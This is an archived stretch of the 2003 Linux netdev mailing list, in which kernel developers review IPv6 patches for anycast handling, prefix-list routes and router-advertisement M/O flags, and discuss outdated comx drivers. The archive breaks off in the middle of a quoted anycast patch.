Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article (at Thu, 17 Jul 2003 15:06:02 -0700 (PDT)), Krishna Kumar says: > The same patch against 2.4.21 Hmm, you seems still misunderstanding some of our points. :-p Alexey says we may want to use ifi_family for per-interface L3 information including M/O bits. At least, new RTM_xxx should not be restricted to get such flags. -- Hideaki YOSHIFUJI @ USAGI Project GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA From yoshfuji@linux-ipv6.org Thu Jul 17 15:26:30 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 15:26:36 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HMQTFl002830 for ; Thu, 17 Jul 2003 15:26:30 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6HMS1Bo013388; Fri, 18 Jul 2003 07:28:01 +0900 Date: Fri, 18 Jul 2003 00:28:01 +0200 (CEST) Message-Id: <20030718.002801.91948420.yoshfuji@linux-ipv6.org> To: davem@redhat.com Cc: kuznet@ms2.inr.ac.ru, pekkas@netcore.fi, mika.liljeberg@welho.com, jmorris@redhat.com, netdev@oss.sgi.com, dlstevens@us.ibm.com, yoshfuji@linux-ipv6.org Subject: Re: Anycast usage, final diagnosis? (was: IPv6: Fix broken anycast From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <20030717145115.046fd5ee.davem@redhat.com> References: <200307172052.AAA15032@dub.inr.ac.ru> <20030717145115.046fd5ee.davem@redhat.com> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4147 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <20030717145115.046fd5ee.davem@redhat.com> (at Thu, 17 Jul 2003 14:51:15 -0700), "David S. Miller" says: > > > No user should be able to join anycast group, IMHO. > > > > OK. Done, the patch enclosed. > > Pekka, please ACK Alexey's patch, I'd like to apply it. I'm not pekka, but It seems ok to me, too. --yoshfuji From krkumar@us.ibm.com Thu Jul 17 15:34:41 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 15:34:45 -0700 (PDT) Received: from e1.ny.us.ibm.com (e1.ny.us.ibm.com [32.97.182.101]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HMYYFl003373 for ; Thu, 17 Jul 2003 15:34:40 -0700 Received: from northrelay02.pok.ibm.com (northrelay02.pok.ibm.com [9.56.224.150]) by e1.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6HMXiKb214574; Thu, 17 Jul 2003 18:33:44 -0400 Received: from us.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay02.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6HMXf1V059276; Thu, 17 Jul 2003 18:33:42 -0400 Message-ID: <3F17245D.9040806@us.ibm.com> Date: Thu, 17 Jul 2003 15:34:05 -0700 From: Krishna Kumar Organization: IBM User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130 X-Accept-Language: en-us, en MIME-Version: 1.0 To: YOSHIFUJI Hideaki CC: krkumar@us.ibm.com, kuznet@ms2.inr.ac.ru, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org Subject: Re: [PATCH 2/2] Prefix List and O/M flags against 2.4.21 References: <20030718.002209.104303756.yoshfuji@linux-ipv6.org> In-Reply-To: <20030718.002209.104303756.yoshfuji@linux-ipv6.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4148 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev > Hmm, you seems still misunderstanding some of our points. :-p > Alexey says we may want to use ifi_family for per-interface L3 information > including M/O bits. It is not a misunderstanding, I had replied to that mail saying that I don't have any knowledge of using this new interface. If you prefer, I can split the patch for prefix list vs O/M bits so that the former is accepted without any issues. Someone else can modify the O/M to suit new needs. Does that sound OK with you ? > At least, new RTM_xxx should not be restricted to get such flags. That's why I had suggested that we can use RTM_GETLNKINFO with more information, like RTA_IFFLAGS, and other things like stats or whatever. That can be done easily enough and still be functionally complete. I just don't have any idea about this new interface. Is this still a problem ? thanks, - KK From yoshfuji@linux-ipv6.org Thu Jul 17 15:45:28 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 15:45:38 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HMjRFl004115 for ; Thu, 17 Jul 2003 15:45:28 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6HMl2Bo013503; Fri, 18 Jul 2003 07:47:02 +0900 Date: Fri, 18 Jul 2003 00:47:01 +0200 (CEST) Message-Id: <20030718.004701.11546819.yoshfuji@linux-ipv6.org> To: krkumar@us.ibm.com Cc: kuznet@ms2.inr.ac.ru, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org, yoshfuji@linux-ipv6.org Subject: Re: [PATCH 2/2] Prefix List and O/M flags against 2.4.21 From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <3F17245D.9040806@us.ibm.com> References: <20030718.002209.104303756.yoshfuji@linux-ipv6.org> <3F17245D.9040806@us.ibm.com> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4149 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <3F17245D.9040806@us.ibm.com> (at Thu, 17 Jul 2003 15:34:05 -0700), Krishna Kumar says: > have any knowledge of using this new interface. If you prefer, I can split the > patch for prefix list vs O/M bits so that the former is accepted without any > issues. Someone else can modify the O/M to suit new needs. Does that sound OK > with you ? Yes, please split up the patch. > > At least, new RTM_xxx should not be restricted to get such flags. > > That's why I had suggested that we can use RTM_GETLNKINFO with more information, > like RTA_IFFLAGS, and other things like stats or whatever. That can be done > easily enough and still be functionally complete. I just don't have any idea > about this new interface. > > Is this still a problem ? Hmm, I might miss something. Anyway, it seems we're reaching consensus. --yoshfuji From shemminger@osdl.org Thu Jul 17 16:33:54 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 16:34:01 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HNXrFl006194 for ; Thu, 17 Jul 2003 16:33:54 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6HNXbI13127; Thu, 17 Jul 2003 16:33:37 -0700 Date: Thu, 17 Jul 2003 16:33:37 -0700 From: Stephen Hemminger To: Gergely Madarasz , Jeff Garzik Cc: netdev@oss.sgi.com Subject: comx drivers in 2.6 Message-Id: <20030717163337.78d123c0.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4150 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev It looks like the comx drivers never got updated for 2.5/2.6. Some obvious issues are: - lots of use of /proc files without setting the owner field. - still using cli/sti - no SMP locking on the linked list (which could be changed to list macros) of hardware and protocols. Just bumped into this while trying to inspect for all the last possible broken usage of net_device structure. It is too far behind to address those issues. From jgarzik@pobox.com Thu Jul 17 16:42:48 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 16:42:52 -0700 (PDT) Received: from www.linux.org.uk (IDENT:Zg4GfCQZ2hHsbGhjp1FwzLmB9lJu4AKM@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HNgeFl006773 for ; Thu, 17 Jul 2003 16:42:47 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19dIOU-0007ke-8P; Fri, 18 Jul 2003 00:42:38 +0100 Message-ID: <3F173458.6060405@pobox.com> Date: Thu, 17 Jul 2003 19:42:16 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: Stephen Hemminger CC: Gergely Madarasz , netdev@oss.sgi.com Subject: Re: comx drivers in 2.6 References: <20030717163337.78d123c0.shemminger@osdl.org> In-Reply-To: <20030717163337.78d123c0.shemminger@osdl.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4151 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev Stephen Hemminger wrote: > It looks like the comx drivers never got updated for 2.5/2.6. Some > obvious issues are: > - lots of use of /proc files without setting the owner field. > - still using cli/sti > - no SMP locking on the linked list (which could be changed to list macros) > of hardware and protocols. > > Just bumped into this while trying to inspect for all the last possible > broken usage of net_device structure. It is too far behind to address > those issues. Submit a patch to mark these CONFIG_OBSOLETE. AFAIK nobody has cared for most of them since 2.2... (munich is an exception) Jeff From krkumar@us.ibm.com Thu Jul 17 17:39:50 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 17:40:00 -0700 (PDT) Received: from e35.co.us.ibm.com (e35.co.us.ibm.com [32.97.110.133]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6I0dgFl009591 for ; Thu, 17 Jul 2003 17:39:50 -0700 Received: from westrelay04.boulder.ibm.com (westrelay04.boulder.ibm.com [9.17.193.32]) by e35.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6I0coc8242264; Thu, 17 Jul 2003 20:38:50 -0400 Received: from DYN318430.beaverton.ibm.com (d03av02.boulder.ibm.com [9.17.193.82]) by westrelay04.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6I0cjOr184290; Thu, 17 Jul 2003 18:38:49 -0600 Date: Thu, 17 Jul 2003 17:37:18 -0700 (PDT) From: Krishna Kumar X-X-Sender: krkumar@DYN318430.beaverton.ibm.com To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= cc: kuznet@ms2.inr.ac.ru, , , , Subject: Re: [PATCH 2/2] Prefix List and O/M flags against 2.5.73 In-Reply-To: <20030718.004701.11546819.yoshfuji@linux-ipv6.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4152 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev > Yes, please split up the patch. Following is the split patch for prefix list and O/M flags. > Anyway, it seems we're reaching consensus. Great! Glad we have reached consensus because I am exhausted! Since you have agreed to the above proposal, the prefix list patch has to be applied before the O/M flags patch. I have kept the RTM_GETLNKINFO and specified a new option to get the flags information, this can be extended later to add more options for other paramters. Thanks, - KK ------------------- Patch for prefix list against 2.5.73 ------------ diff -ruN linux-2.5.73.org/include/linux/ipv6_route.h test/linux-2.5.73/include/linux/ipv6_route.h --- linux-2.5.73.org/include/linux/ipv6_route.h 2003-06-22 11:32:36.000000000 -0700 +++ test/linux-2.5.73/include/linux/ipv6_route.h 2003-07-17 11:38:23.000000000 -0700 @@ -16,6 +16,7 @@ #define RTF_DEFAULT 0x00010000 /* default - learned via ND */ #define RTF_ALLONLINK 0x00020000 /* fallback, no routers on link */ #define RTF_ADDRCONF 0x00040000 /* addrconf route - RA */ +#define RTF_PREFIX_RT 0x00080000 /* A prefix only route - RA */ #define RTF_NONEXTHOP 0x00200000 /* route with no nexthop */ #define RTF_EXPIRES 0x00400000 diff -ruN linux-2.5.73.org/include/linux/rtnetlink.h test/linux-2.5.73/include/linux/rtnetlink.h --- linux-2.5.73.org/include/linux/rtnetlink.h 2003-06-22 11:33:07.000000000 -0700 +++ test/linux-2.5.73/include/linux/rtnetlink.h 2003-07-17 16:57:52.000000000 -0700 @@ -168,6 +168,7 @@ #define RTM_F_NOTIFY 0x100 /* Notify user of route change */ #define RTM_F_CLONED 0x200 /* This route is cloned */ #define RTM_F_EQUALIZE 0x400 /* Multipath equalizer: NI */ +#define RTM_F_PREFIX 0x800 /* Prefix addresses */ /* Reserved table identifiers */ diff -ruN linux-2.5.73.org/net/ipv6/addrconf.c test/linux-2.5.73/net/ipv6/addrconf.c --- linux-2.5.73.org/net/ipv6/addrconf.c 2003-06-22 11:33:17.000000000 -0700 +++ test/linux-2.5.73/net/ipv6/addrconf.c 2003-07-17 16:59:17.000000000 -0700 @@ -129,7 +129,7 @@ static int addrconf_ifdown(struct net_device *dev, int how); -static void addrconf_dad_start(struct inet6_ifaddr *ifp); +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags); static void addrconf_dad_timer(unsigned long data); static void addrconf_dad_completed(struct inet6_ifaddr *ifp); static void addrconf_rs_timer(unsigned long data); @@ -715,7 +715,7 @@ ift->prefered_lft = tmp_prefered_lft; ift->tstamp = ifp->tstamp; spin_unlock_bh(&ift->lock); - addrconf_dad_start(ift); + addrconf_dad_start(ift, 0); in6_ifa_put(ift); in6_dev_put(idev); out: @@ -1211,7 +1211,7 @@ rtmsg.rtmsg_dst_len = 8; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; rtmsg.rtmsg_ifindex = dev->ifindex; - rtmsg.rtmsg_flags = RTF_UP|RTF_ADDRCONF; + rtmsg.rtmsg_flags = RTF_UP; rtmsg.rtmsg_type = RTMSG_NEWROUTE; ip6_route_add(&rtmsg, NULL, NULL); } @@ -1238,7 +1238,7 @@ struct in6_addr addr; ipv6_addr_set(&addr, htonl(0xFE800000), 0, 0, 0); - addrconf_prefix_route(&addr, 64, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&addr, 64, dev, 0, 0); } static struct inet6_dev *addrconf_add_dev(struct net_device *dev) @@ -1330,7 +1330,8 @@ } } else if (pinfo->onlink && valid_lft) { addrconf_prefix_route(&pinfo->prefix, pinfo->prefix_len, - dev, rt_expires, RTF_ADDRCONF|RTF_EXPIRES); + dev, rt_expires, + RTF_ADDRCONF|RTF_EXPIRES|RTF_PREFIX_RT); } if (rt) dst_release(&rt->u.dst); @@ -1378,7 +1379,7 @@ } create = 1; - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, RTF_ADDRCONF|RTF_PREFIX_RT); } if (ifp && valid_lft == 0) { @@ -1529,7 +1530,7 @@ ifp = ipv6_add_addr(idev, pfx, plen, scope, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); return 0; } @@ -1704,7 +1705,7 @@ ifp = ipv6_add_addr(idev, addr, 64, IFA_LINK, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); } } @@ -1943,8 +1944,7 @@ memset(&rtmsg, 0, sizeof(struct in6_rtmsg)); rtmsg.rtmsg_type = RTMSG_NEWROUTE; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; - rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_ADDRCONF | - RTF_DEFAULT | RTF_UP); + rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_DEFAULT | RTF_UP); rtmsg.rtmsg_ifindex = ifp->idev->dev->ifindex; @@ -1958,7 +1958,7 @@ /* * Duplicate Address Detection */ -static void addrconf_dad_start(struct inet6_ifaddr *ifp) +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags) { struct net_device *dev; unsigned long rand_num; @@ -1968,7 +1968,7 @@ addrconf_join_solict(dev, &ifp->addr); if (ifp->prefix_len != 128 && (ifp->flags&IFA_F_PERMANENT)) - addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, flags); net_srandom(ifp->addr.s6_addr32[3]); rand_num = net_random() % (ifp->idev->cnf.rtr_solicit_delay ? : 1); diff -ruN linux-2.5.73.org/net/ipv6/route.c test/linux-2.5.73/net/ipv6/route.c --- linux-2.5.73.org/net/ipv6/route.c 2003-06-22 11:33:05.000000000 -0700 +++ test/linux-2.5.73/net/ipv6/route.c 2003-07-16 10:42:01.000000000 -0700 @@ -1400,13 +1400,20 @@ struct in6_addr *src, int iif, int type, u32 pid, u32 seq, - struct nlmsghdr *in_nlh) + struct nlmsghdr *in_nlh, int prefix) { struct rtmsg *rtm; struct nlmsghdr *nlh; unsigned char *b = skb->tail; struct rta_cacheinfo ci; + if (prefix) { /* user wants prefix routes only */ + if (!(rt->rt6i_flags & RTF_PREFIX_RT)) { + /* success since this is not a prefix route */ + return 1; + } + } + if (!pid && in_nlh) { pid = in_nlh->nlmsg_pid; } @@ -1487,10 +1494,16 @@ static int rt6_dump_route(struct rt6_info *rt, void *p_arg) { struct rt6_rtnl_dump_arg *arg = (struct rt6_rtnl_dump_arg *) p_arg; + struct rtmsg *rtm; + int prefix; + rtm = NLMSG_DATA(arg->cb->nlh); + if (rtm) + prefix = (rtm->rtm_flags & RTM_F_PREFIX) != 0; + else prefix = 0; return rt6_fill_node(arg->skb, rt, NULL, NULL, 0, RTM_NEWROUTE, NETLINK_CB(arg->cb->skb).pid, arg->cb->nlh->nlmsg_seq, - NULL); + NULL, prefix); } static int fib6_dump_node(struct fib6_walker_t *w) @@ -1638,7 +1651,7 @@ &fl.fl6_dst, &fl.fl6_src, iif, RTM_NEWROUTE, NETLINK_CB(in_skb).pid, - nlh->nlmsg_seq, nlh); + nlh->nlmsg_seq, nlh, 0); if (err < 0) { err = -EMSGSIZE; goto out_free; @@ -1664,7 +1677,7 @@ netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, ENOBUFS); return; } - if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh) < 0) { + if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh, 0) < 0) { kfree_skb(skb); netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, EINVAL); return; -------- Patch for O/M flags against 2.5.73 (dependent on previous patch ----- diff -ruN linux-2.5.73.org/include/linux/rtnetlink.h test/linux-2.5.73/include/linux/rtnetlink.h --- linux-2.5.73.org/include/linux/rtnetlink.h 2003-06-22 11:33:07.000000000 -0700 +++ test/linux-2.5.73/include/linux/rtnetlink.h 2003-07-17 16:57:52.000000000 -0700 @@ -47,7 +47,9 @@ #define RTM_DELTFILTER (RTM_BASE+29) #define RTM_GETTFILTER (RTM_BASE+30) -#define RTM_MAX (RTM_BASE+31) +#define RTM_GETLNKINFO (RTM_BASE+34) + +#define RTM_MAX (RTM_GETLNKINFO+1) /* Generic structure for encapsulation of optional route information. @@ -61,6 +63,13 @@ unsigned short rta_type; }; +/* Structure to return per interface device flags */ +struct ifp_if6info +{ + int ifindex; + int flags; +}; + /* Macros to handle rtattributes */ #define RTA_ALIGNTO 4 @@ -331,6 +340,7 @@ IFA_LABEL, IFA_BROADCAST, IFA_ANYCAST, + IFA_IFFLAGS, IFA_CACHEINFO }; diff -ruN linux-2.5.73.org/include/net/if_inet6.h test/linux-2.5.73/include/net/if_inet6.h --- linux-2.5.73.org/include/net/if_inet6.h 2003-06-22 11:33:32.000000000 -0700 +++ test/linux-2.5.73/include/net/if_inet6.h 2003-07-16 17:23:24.000000000 -0700 @@ -17,6 +17,8 @@ #include +#define IF_RA_OTHERCONF 0x80 +#define IF_RA_MANAGED 0x40 #define IF_RA_RCVD 0x20 #define IF_RS_SENT 0x10 diff -ruN linux-2.5.73.org/net/ipv6/addrconf.c test/linux-2.5.73/net/ipv6/addrconf.c --- linux-2.5.73.org/net/ipv6/addrconf.c 2003-06-22 11:33:17.000000000 -0700 +++ test/linux-2.5.73/net/ipv6/addrconf.c 2003-07-17 16:59:17.000000000 -0700 @@ -2451,6 +2451,43 @@ netlink_broadcast(rtnl, skb, 0, RTMGRP_IPV6_IFADDR, GFP_ATOMIC); } +int inet6_dump_linkinfo(struct sk_buff *skb, struct netlink_callback *cb) +{ + int ifindex, flags; + struct net_device *dev; + struct inet6_dev *idev; + struct nlmsghdr *nlh; + struct ifp_if6info ifp, *input_ifp = NLMSG_DATA(cb->nlh); + unsigned char *org_tail = skb->tail; + + ifindex = input_ifp->ifindex; + if ((dev = dev_get_by_index(ifindex)) == NULL) + goto out; + if ((idev = in6_dev_get(dev)) != NULL) { + flags = idev->if_flags; + in6_dev_put(idev); + } else + flags = 0; + dev_put(dev); + + nlh = NLMSG_PUT(skb, NETLINK_CB(cb->skb).pid, cb->nlh->nlmsg_seq, + RTM_GETLNKINFO, sizeof(*input_ifp)); + ifp.flags = flags; + ifp.ifindex = ifindex; /* duplicate info for user to verify */ + RTA_PUT(skb, IFA_IFFLAGS, sizeof(ifp), &ifp); + + nlh->nlmsg_len = skb->tail - org_tail; + return skb->len; + +nlmsg_failure: +rtattr_failure: + printk(KERN_INFO "inet6_dump_linkinfo:skb size not enough\n"); + skb_trim(skb, org_tail - skb->data); + +out: + return -1; +} + static struct rtnetlink_link inet6_rtnetlink_table[RTM_MAX - RTM_BASE + 1] = { [RTM_NEWADDR - RTM_BASE] = { .doit = inet6_rtm_newaddr, }, [RTM_DELADDR - RTM_BASE] = { .doit = inet6_rtm_deladdr, }, @@ -2459,6 +2496,7 @@ [RTM_DELROUTE - RTM_BASE] = { .doit = inet6_rtm_delroute, }, [RTM_GETROUTE - RTM_BASE] = { .doit = inet6_rtm_getroute, .dumpit = inet6_dump_fib, }, + [RTM_GETLNKINFO - RTM_BASE] = {.dumpit = inet6_dump_linkinfo, }, }; static void ipv6_ifa_notify(int event, struct inet6_ifaddr *ifp) diff -ruN linux-2.5.73.org/net/ipv6/ndisc.c test/linux-2.5.73/net/ipv6/ndisc.c --- linux-2.5.73.org/net/ipv6/ndisc.c 2003-06-22 11:32:56.000000000 -0700 +++ test/linux-2.5.73/net/ipv6/ndisc.c 2003-07-14 15:06:14.000000000 -0700 @@ -1036,6 +1036,16 @@ */ in6_dev->if_flags |= IF_RA_RCVD; } + /* + * Remember the managed/otherconf flags from most recently + * receieved RA message (RFC 2462) -- yoshfuji + */ + in6_dev->if_flags = (in6_dev->if_flags & ~(IF_RA_MANAGED| + IF_RA_OTHERCONF)) | + (ra_msg->icmph.icmp6_addrconf_managed ? + IF_RA_MANAGED : 0) | + (ra_msg->icmph.icmp6_addrconf_other ? + IF_RA_OTHERCONF : 0); lifetime = ntohs(ra_msg->icmph.icmp6_rt_lifetime); ------------------------------------------------------------------------ From jmorris@intercode.com.au Thu Jul 17 18:53:36 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 18:53:44 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:/TOsYz1K6pnXF3wQu8RAZtiMVi3x1Y3Z@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6I1rXFl012989 for ; Thu, 17 Jul 2003 18:53:34 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h6I1r6r25445; Fri, 18 Jul 2003 11:53:07 +1000 Date: Fri, 18 Jul 2003 11:53:06 +1000 (EST) From: James Morris To: Jim Keniston cc: Andrew Morton , , , , , , , Subject: Re: [PATCH] [1/2] kernel error reporting (revised) In-Reply-To: <3F16F54C.949A9299@us.ibm.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4153 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On Thu, 17 Jul 2003, Jim Keniston wrote: > 3. Given the above, what should the evlog.c caller do when > kernel_error_event_iov() returns -EINPROGRESS? > a. Nothing. Figure the packet will probably get logged. > b. Just to be safe, report it via printk, the same way we report dropped > packets. > We currently do (a). (b) would mean that every event logged from IRQ > context would be cc-ed to printk. I don't think this irq detection logic should be added at all here, let the caller reschedule its logging if running in irq context. - James -- James Morris From pekkas@netcore.fi Thu Jul 17 23:53:06 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 23:53:22 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6I6r4Fl022740 for ; Thu, 17 Jul 2003 23:53:05 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6I6iln15420; Fri, 18 Jul 2003 09:44:47 +0300 Date: Fri, 18 Jul 2003 09:44:46 +0300 (EEST) From: Pekka Savola To: kuznet@ms2.inr.ac.ru cc: Mika Liljeberg , , , , Subject: Re: Anycast usage, final diagnosis? (was: IPv6: Fix broken anycast In-Reply-To: <200307172052.AAA15032@dub.inr.ac.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4154 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Fri, 18 Jul 2003 kuznet@ms2.inr.ac.ru wrote: > > No user should be able to join anycast group, IMHO. > > OK. Done, the patch enclosed. Based on a quick glance, looks OK. Better than the code we have now.. > Another rfc question: is random delay answering solicitations for > anycast not required already? I'm not sure whether this is what you're asking but..: When responding to an NS with an NA w/ anycast address, the response SHOULD be delayed by a random 0..MAX_ANYCAST_DELAY_TIME (1 by default) seconds. (Override bit also SHOULD be set to 0.) > # This is a BitKeeper generated patch for the following project: > # Project Name: Linux kernel tree > # This patch format is intended for GNU patch command version 2.5 or higher. > # This patch includes the following deltas: > # ChangeSet 1.1469 -> 1.1470 > # net/ipv6/anycast.c 1.5 -> 1.6 > # include/net/ip6_route.h 1.10 -> 1.11 > # net/ipv6/icmp.c 1.36 -> 1.37 > # net/ipv6/tcp_ipv6.c 1.64 -> 1.65 > # net/ipv6/ndisc.c 1.52 -> 1.53 > # net/ipv6/route.c 1.50 -> 1.51 > # include/net/ipv6.h 1.22 -> 1.23 > # net/ipv6/addrconf.c 1.58 -> 1.59 > # > # The following is the BitKeeper ChangeSet Log > # -------------------------------------------- > # 03/07/18 kuznet@oops.inr.ac.ru 1.1470 > # IPv6: sanitize anycast address support > # -------------------------------------------- > # > diff -Nru a/include/net/ip6_route.h b/include/net/ip6_route.h > --- a/include/net/ip6_route.h Fri Jul 18 00:49:43 2003 > +++ b/include/net/ip6_route.h Fri Jul 18 00:49:43 2003 > @@ -45,7 +45,8 @@ > void *rtattr); > > extern int ip6_rt_addr_add(struct in6_addr *addr, > - struct net_device 